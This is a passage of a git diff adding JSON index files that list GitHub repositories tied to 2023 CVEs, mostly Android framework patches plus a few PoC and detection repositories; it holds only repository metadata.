+ "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_av_AOSP10_r33_CVE-2023-20933", + "description": null, + "fork": false, + "created_at": "2023-04-05T06:04:42Z", + "updated_at": "2023-04-05T06:26:28Z", + "pushed_at": "2023-04-05T06:27:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20943.json b/2023/CVE-2023-20943.json new file mode 100644 index 0000000000..ab468e2463 --- /dev/null +++ b/2023/CVE-2023-20943.json @@ -0,0 +1,64 @@ +[ + { + "id": 622942438, + "name": "frameworks_base_CVE-2023-20943", + "full_name": "Trinadh465\/frameworks_base_CVE-2023-20943", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_CVE-2023-20943", + "description": null, + "fork": false, + "created_at": "2023-04-03T11:32:21Z", + "updated_at": "2023-04-03T11:44:16Z", + "pushed_at": "2023-04-03T11:45:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 623922493, + "name": "platform_frameworks_base_AOSP10_r33_CVE-2023-20943", + "full_name": "hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2023-20943", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2023-20943", + "description": null, + "fork": false, + "created_at": "2023-04-05T11:24:29Z", + "updated_at": "2023-04-05T11:38:00Z", + "pushed_at": "2023-04-05T11:45:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20944.json b/2023/CVE-2023-20944.json new file mode 100644 index 0000000000..ebd7c394a5 --- /dev/null +++ b/2023/CVE-2023-20944.json @@ -0,0 +1,64 @@ +[ + { + "id": 622958638, + "name": "frameworks_base_CVE-2023-20944", + "full_name": "Trinadh465\/frameworks_base_CVE-2023-20944", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_CVE-2023-20944", + "description": null, + "fork": false, + "created_at": "2023-04-03T12:12:17Z", + "updated_at": "2023-04-03T12:19:44Z", + "pushed_at": "2023-04-03T12:19:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 623455012, + "name": "platform_frameworks_base_AOSP10_r33_CVE-2023-20944", + "full_name": "hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2023-20944", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2023-20944", + "description": null, + "fork": false, + "created_at": "2023-04-04T12:07:19Z", + "updated_at": "2023-04-04T12:19:39Z", + "pushed_at": "2023-04-04T12:35:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20945.json b/2023/CVE-2023-20945.json new file mode 100644 index 0000000000..5e5034f99d --- /dev/null +++ b/2023/CVE-2023-20945.json @@ -0,0 +1,33 @@ +[ + { + "id": 824635242, + "name": "CVE-2023-20945", + "full_name": "Ailenchick\/CVE-2023-20945", + "owner": { + "login": "Ailenchick", + "id": 71263121, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71263121?v=4", + "html_url": "https:\/\/github.com\/Ailenchick", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ailenchick\/CVE-2023-20945", + "description": null, + "fork": false, + "created_at": "2024-07-05T15:03:40Z", + "updated_at": "2024-07-05T15:07:42Z", + "pushed_at": "2024-07-05T15:07:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20955.json b/2023/CVE-2023-20955.json new file mode 100644 index 0000000000..d02f33d008 --- /dev/null +++ b/2023/CVE-2023-20955.json @@ -0,0 +1,33 @@ +[ + { + "id": 710323089, + "name": "packages_apps_Settings_AOSP10_r33_CVE-2023-20955", + "full_name": "Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2023-20955", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2023-20955", + "description": null, + "fork": false, + "created_at": "2023-10-26T13:19:06Z", + "updated_at": "2023-10-26T13:22:14Z", + "pushed_at": "2023-10-26T13:22:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20963.json b/2023/CVE-2023-20963.json new file mode 100644 index 0000000000..5c7755af7e --- /dev/null +++ b/2023/CVE-2023-20963.json @@ -0,0 +1,95 @@ +[ + { + "id": 652570287, + "name": "BadParcel", + "full_name": "pwnipc\/BadParcel", + "owner": { + "login": "pwnipc", + "id": 60155767, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60155767?v=4", + "html_url": "https:\/\/github.com\/pwnipc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pwnipc\/BadParcel", + "description": "CVE-2023-20963 PoC (Android WorkSource parcel\/unparcel logic mismatch)", + "fork": false, + "created_at": "2023-06-12T10:44:59Z", + "updated_at": "2024-11-30T07:37:27Z", + "pushed_at": "2024-04-27T20:15:24Z", + "stargazers_count": 56, + "watchers_count": 56, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 56, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707608234, + "name": "frameworks_base_AOSP10_r33_CVE-2023-20963", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-20963", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-20963", + "description": null, + "fork": false, + "created_at": "2023-10-20T09:11:00Z", + "updated_at": "2023-10-20T09:17:03Z", + "pushed_at": "2023-10-20T09:16:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824634694, + "name": "CVE-2023-20963", + "full_name": "Ailenchick\/CVE-2023-20963", + "owner": { + "login": "Ailenchick", + "id": 71263121, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71263121?v=4", + "html_url": "https:\/\/github.com\/Ailenchick", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ailenchick\/CVE-2023-20963", + "description": null, + "fork": false, + "created_at": "2024-07-05T15:02:07Z", + "updated_at": "2024-07-05T15:15:12Z", + "pushed_at": "2024-07-05T15:02:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21036.json b/2023/CVE-2023-21036.json new file mode 100644 index 0000000000..77f9f7467e --- /dev/null +++ b/2023/CVE-2023-21036.json @@ -0,0 +1,136 @@ +[ + { + "id": 615901503, + "name": "AntiCropalypse", + "full_name": "qixils\/AntiCropalypse", + "owner": { + "login": "qixils", + "id": 13265322, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13265322?v=4", + "html_url": "https:\/\/github.com\/qixils", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qixils\/AntiCropalypse", + "description": "Discord bot for mitigating the aCropalypse vulnerability (CVE-2023-21036, CVE-2023-28303) by retroactively deleting vulnerable images", + "fork": false, + "created_at": "2023-03-19T02:15:23Z", + "updated_at": "2023-10-17T17:27:44Z", + "pushed_at": "2023-04-01T04:54:08Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "acropalypse", + "bot", + "discord", + "discord-bot", + "kotlin", + "mitigation" + ], + "visibility": "public", + "forks": 1, + "watchers": 21, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 617519255, + "name": "CVE-2023-21036", + "full_name": "infobyte\/CVE-2023-21036", + "owner": { + "login": "infobyte", + "id": 4226354, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4226354?v=4", + "html_url": "https:\/\/github.com\/infobyte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/infobyte\/CVE-2023-21036", + "description": "Detection and sanitization for Acropalypse Now - CVE-2023-21036", + "fork": false, + "created_at": "2023-03-22T14:59:42Z", + "updated_at": "2024-09-06T13:10:33Z", + "pushed_at": "2023-05-15T12:12:33Z", + "stargazers_count": 78, + "watchers_count": 78, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 78, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 618966092, + "name": "gocropalypse", + "full_name": "notaSWE\/gocropalypse", + "owner": { + "login": "notaSWE", + "id": 98667270, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98667270?v=4", + "html_url": "https:\/\/github.com\/notaSWE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/notaSWE\/gocropalypse", + "description": "CVE-2023-21036 detection in Go", + "fork": false, + "created_at": "2023-03-25T21:30:57Z", + "updated_at": "2023-03-25T21:40:24Z", + "pushed_at": "2023-03-27T02:11:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 622034666, + "name": "acropadetect", + "full_name": "lordofpipes\/acropadetect", + "owner": { + "login": "lordofpipes", + "id": 68424788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68424788?v=4", + "html_url": "https:\/\/github.com\/lordofpipes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lordofpipes\/acropadetect", + "description": "Web tool for detecting Acropalypse (CVE-2023-21036) https:\/\/lordofpipes.github.io\/acropadetect\/", + "fork": false, + "created_at": "2023-04-01T00:08:15Z", + "updated_at": "2023-04-04T13:41:37Z", + "pushed_at": "2023-04-01T06:50:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "acropalypse", + "cve-2023-21036" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21086.json b/2023/CVE-2023-21086.json new file mode 100644 index 0000000000..79419b12cf --- /dev/null +++ b/2023/CVE-2023-21086.json @@ -0,0 +1,33 @@ +[ + { + "id": 709780898, + "name": "packages_apps_Settings_CVE-2023-21086", + "full_name": "Trinadh465\/packages_apps_Settings_CVE-2023-21086", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Settings_CVE-2023-21086", + "description": null, + "fork": false, + "created_at": "2023-10-25T11:42:32Z", + "updated_at": "2023-10-25T11:54:12Z", + "pushed_at": "2023-10-25T12:25:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21094.json b/2023/CVE-2023-21094.json new file mode 100644 index 0000000000..5248ffe8db --- /dev/null +++ b/2023/CVE-2023-21094.json @@ -0,0 +1,33 @@ +[ + { + "id": 709692273, + "name": "frameworks_native_AOSP-10_r33_CVE-2023-21094", + "full_name": "Trinadh465\/frameworks_native_AOSP-10_r33_CVE-2023-21094", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_native_AOSP-10_r33_CVE-2023-21094", + "description": null, + "fork": false, + "created_at": "2023-10-25T07:54:39Z", + "updated_at": "2024-12-01T07:02:11Z", + "pushed_at": "2023-10-25T08:11:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21097.json b/2023/CVE-2023-21097.json new file mode 100644 index 0000000000..83abfe7ad9 --- /dev/null +++ b/2023/CVE-2023-21097.json @@ -0,0 +1,64 @@ +[ + { + "id": 710167473, + "name": "frameworks_base_AOSP10_r33_CVE-2023-21097", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21097", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21097", + "description": null, + "fork": false, + "created_at": "2023-10-26T06:46:14Z", + "updated_at": "2023-10-26T06:52:57Z", + "pushed_at": "2023-10-26T06:51:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 710334684, + "name": "frameworks_base_AOSP10_r33_CVE-2023-21097", + "full_name": "uthrasri\/frameworks_base_AOSP10_r33_CVE-2023-21097", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/frameworks_base_AOSP10_r33_CVE-2023-21097", + "description": null, + "fork": false, + "created_at": "2023-10-26T13:44:13Z", + "updated_at": "2023-10-26T15:14:58Z", + "pushed_at": "2023-10-26T19:58:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21109.json b/2023/CVE-2023-21109.json new file mode 100644 index 0000000000..49750be6cc --- /dev/null +++ b/2023/CVE-2023-21109.json @@ -0,0 +1,64 @@ +[ + { + "id": 720349935, + "name": "frameworks_base_AOSP10_CVE-2023-21109r33_", + "full_name": "Trinadh465\/frameworks_base_AOSP10_CVE-2023-21109r33_", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_CVE-2023-21109r33_", + "description": null, + "fork": false, + "created_at": "2023-11-18T07:50:57Z", + "updated_at": "2023-11-18T07:50:57Z", + "pushed_at": "2023-11-18T07:50:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 720351156, + "name": "frameworks_base_AOSP10_r33_CVE-2023-21109", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21109", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21109", + "description": null, + "fork": false, + "created_at": "2023-11-18T07:56:12Z", + "updated_at": "2023-11-18T08:39:11Z", + "pushed_at": "2023-11-18T11:41:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21118.json b/2023/CVE-2023-21118.json new file mode 100644 index 0000000000..2e005d60a8 --- /dev/null +++ b/2023/CVE-2023-21118.json @@ -0,0 +1,64 @@ +[ + { + "id": 729085770, + "name": "frameworks_native_AOSP-10_r33_CVE-2023-21118", + "full_name": "Trinadh465\/frameworks_native_AOSP-10_r33_CVE-2023-21118", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_native_AOSP-10_r33_CVE-2023-21118", + "description": null, + "fork": false, + "created_at": "2023-12-08T11:29:23Z", + "updated_at": "2023-12-08T11:31:11Z", + "pushed_at": "2023-12-08T11:31:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 763868272, + "name": "frameworks_native_AOSP10_r33_CVE-2023-21118", + "full_name": "Satheesh575555\/frameworks_native_AOSP10_r33_CVE-2023-21118", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_native_AOSP10_r33_CVE-2023-21118", + "description": null, + "fork": false, + "created_at": "2024-02-27T03:59:23Z", + "updated_at": "2024-02-27T04:13:46Z", + "pushed_at": "2024-02-27T04:14:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2114.json b/2023/CVE-2023-2114.json new file mode 100644 index 0000000000..95b551891b --- /dev/null +++ b/2023/CVE-2023-2114.json @@ -0,0 +1,33 @@ +[ + { + "id": 623929197, + "name": "nex-forms_SQL-Injection-CVE-2023-2114", + "full_name": "SchmidAlex\/nex-forms_SQL-Injection-CVE-2023-2114", + "owner": { + "login": "SchmidAlex", + "id": 91736634, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91736634?v=4", + "html_url": "https:\/\/github.com\/SchmidAlex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SchmidAlex\/nex-forms_SQL-Injection-CVE-2023-2114", + "description": "Quick Review about the SQL-Injection in the NEX-Forms Plugin for WordPress", + "fork": false, + "created_at": "2023-04-05T11:42:27Z", + "updated_at": "2024-10-15T07:45:41Z", + "pushed_at": "2023-06-05T16:36:34Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21144.json b/2023/CVE-2023-21144.json new file mode 100644 index 0000000000..f1cf7f1dfa --- /dev/null +++ b/2023/CVE-2023-21144.json @@ -0,0 +1,64 @@ +[ + { + "id": 730517826, + "name": "Framework_base_AOSP10_r33_CVE-2023-21144_old", + "full_name": "hshivhare67\/Framework_base_AOSP10_r33_CVE-2023-21144_old", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/Framework_base_AOSP10_r33_CVE-2023-21144_old", + "description": null, + "fork": false, + "created_at": "2023-12-12T05:14:32Z", + "updated_at": "2024-02-28T07:12:02Z", + "pushed_at": "2023-12-12T05:15:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 730528882, + "name": "Framework_base_AOSP10_r33_CVE-2023-21144", + "full_name": "hshivhare67\/Framework_base_AOSP10_r33_CVE-2023-21144", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/Framework_base_AOSP10_r33_CVE-2023-21144", + "description": null, + "fork": false, + "created_at": "2023-12-12T05:54:11Z", + "updated_at": "2024-02-28T07:12:29Z", + "pushed_at": "2023-12-12T06:00:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2123.json b/2023/CVE-2023-2123.json new file mode 100644 index 0000000000..f98b677a11 --- /dev/null +++ b/2023/CVE-2023-2123.json @@ -0,0 +1,36 @@ +[ + { + "id": 628442068, + "name": "poc-cve-xss-encoded-wp-inventory-manager-plugin", + "full_name": "0xn4d\/poc-cve-xss-encoded-wp-inventory-manager-plugin", + "owner": { + "login": "0xn4d", + "id": 85083396, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85083396?v=4", + "html_url": "https:\/\/github.com\/0xn4d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xn4d\/poc-cve-xss-encoded-wp-inventory-manager-plugin", + "description": "PoC for CVE-2023-2123", + "fork": false, + "created_at": "2023-04-16T00:33:56Z", + "updated_at": "2024-04-22T13:52:20Z", + "pushed_at": "2023-06-21T14:38:18Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-2123", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21238.json b/2023/CVE-2023-21238.json new file mode 100644 index 0000000000..ed72c78110 --- /dev/null +++ b/2023/CVE-2023-21238.json @@ -0,0 +1,33 @@ +[ + { + "id": 702861024, + "name": "frameworks_base_AOSP10_r33_CVE-2023-21238", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21238", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21238", + "description": null, + "fork": false, + "created_at": "2023-10-10T06:46:00Z", + "updated_at": "2023-10-10T06:57:51Z", + "pushed_at": "2023-10-10T06:56:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21246.json b/2023/CVE-2023-21246.json new file mode 100644 index 0000000000..d28a1497ee --- /dev/null +++ b/2023/CVE-2023-21246.json @@ -0,0 +1,33 @@ +[ + { + "id": 702369565, + "name": "frameworks_base_AOSP10_r33_CVE-2023-21246", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21246", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21246", + "description": null, + "fork": false, + "created_at": "2023-10-09T07:33:24Z", + "updated_at": "2023-10-09T07:39:52Z", + "pushed_at": "2023-10-09T11:49:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21251.json b/2023/CVE-2023-21251.json new file mode 100644 index 0000000000..fc79c7c97d --- /dev/null +++ b/2023/CVE-2023-21251.json @@ -0,0 +1,33 @@ +[ + { + "id": 703923876, + "name": "frameworks_base_AOSP10_r33_CVE-2023-21251", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21251", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-21251", + "description": null, + "fork": false, + "created_at": "2023-10-12T07:30:13Z", + "updated_at": "2023-10-12T07:35:27Z", + "pushed_at": "2023-10-12T07:34:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21272.json b/2023/CVE-2023-21272.json new file mode 100644 index 0000000000..1a24be1a61 --- /dev/null +++ b/2023/CVE-2023-21272.json @@ -0,0 +1,64 @@ +[ + { + "id": 696732075, + "name": "frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272", + "full_name": 